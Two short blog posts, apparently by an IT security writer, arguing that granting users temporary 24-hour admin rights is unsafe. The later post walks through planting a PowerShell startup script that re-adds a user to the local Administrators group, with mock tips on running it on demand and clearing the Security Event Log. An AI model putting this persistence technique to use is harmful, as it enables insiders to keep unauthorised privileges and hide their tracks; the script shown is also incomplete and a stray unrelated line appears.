19 January 2015
Once you granted 24h admin rights to a user he is able to grant himself privileges with a just few clicks. Startup scripts give an easy means to do this.
About startup scripts.
With startup scripts Windows offers administrators a powerful tool to run commands at system boot. Scripts are stored in directory %windir%\System32\Group Policy\Machine\Scripts\Startup and executed with system privileges.
But just adding a script to the startup directory is not sufficient to execute the script. Because startup scripts could be easily used to compromise a system they have to be enabled through the Local Group Policy Editor gpedit.msc. And at least for enabling a startup script with gpedit.msc local admin privileges are required.
3 Steps for 24h admins to get admin privileges again.
- Create a PowerShell script for adding your user account to the local administrators group.
$Domain = "YourDomain
$Computer = "YourComputer"
$Username = "YourUsername"
$Group = [ADSI]"WinNT://$Computer/Administrators,group"
$User = [ADSI]"WinNT://$Domain/$Username,user"
Save this script to file addMalUser.ps1. To get the exact values for $Domain, $Computer and $User please run set in a command prompt.
- Copy script addMalUser.ps1 to %windir%\System32\GroupPolicy\Machine\Scripts\Startup.
Start gpedit.msc and add script addMalUser.ps1 to the startup scripts.
Gpedit Add Startup Script Dialog (click to enlarge)
Tips for would-be malicious users.
- Purple Loosestrife in my Garden. Feels like Summer.
Please note that this operation is recorded in the Security Event Log of your computer.
Never mind! Only very few organizations are scanning security events on user workstations. Those which tolerate 24h admin rights are certainly not amongst them.
- Please feel free to add switches to this script to run it on demand only. This will help to hide your malicious activities, because you could remove yourself from the admin group or reset the Security Event Log after the job is done.
Have Fun with 24h Admin Rights!
17 January 2015
If you work in the IT group of a (large) enterprise you have certainly heard statements like
- It’s often cheaper to give a user admin rights to install something versus assigning a technician to do installation work.
- I need admin rights for 24h because the installation of this software suite takes a whole working day. I can’t get my job done because the technician blocks my computer all day.
Generally IT groups quickly come forward with some tools because they don’t want to slow-down business and, very often before business puts too much pressure on them.
A very easy solution it to grant the user admin privileges for 12 or 24 hours. Procedures like the following are very popular:
- Tell the user the password of the local administrator account on the user’s computer. Reset the password after 24 hours.
- Add the users account for 24 hours to the local administrators group.
- Create a new local account with admin privileges on the user’s computer and make the login data available to the user. Remove the local account after 24 hours.
This sounds pretty secure, doesn’t it? Unfortunately all this is just window-dressing. We create potential security holes of barn door size which could be used by a malicious insider to attack the entire network.
Just some comments on the apparently secure procedures above. A user with administrative privileges
- Could create an additional administrator account for later use. This is easy to detect and to fix.
- Could grant local user rights like ‘Act as part of the operating system’ or ‘Logon as a service’ to his standard domain account. The effort to detect changes of this sort is considerably higher.
- Could change network protocol signing and encryption options. This will allow a malicious insider to hack passwords …
To be honest, there is no secure way to remove local admin privileges from a user except by reinstallation of his computer, but …
This 24h admin rights discussion is in my opinion a matter of leadership. The response of the IT leaders and the business leaders to such requests should be a crystal clear No, because we put business on risk. And the IT groups have to find ways to support the users in a timely manner.
By the way, from an economical point of view it does not make sense if highly paid experts install software on their computers. That’s just waste of creativity. Maybe this is a good argument for business leaders to refuse the next request for 24 hours admin rights.
Have a good weekend.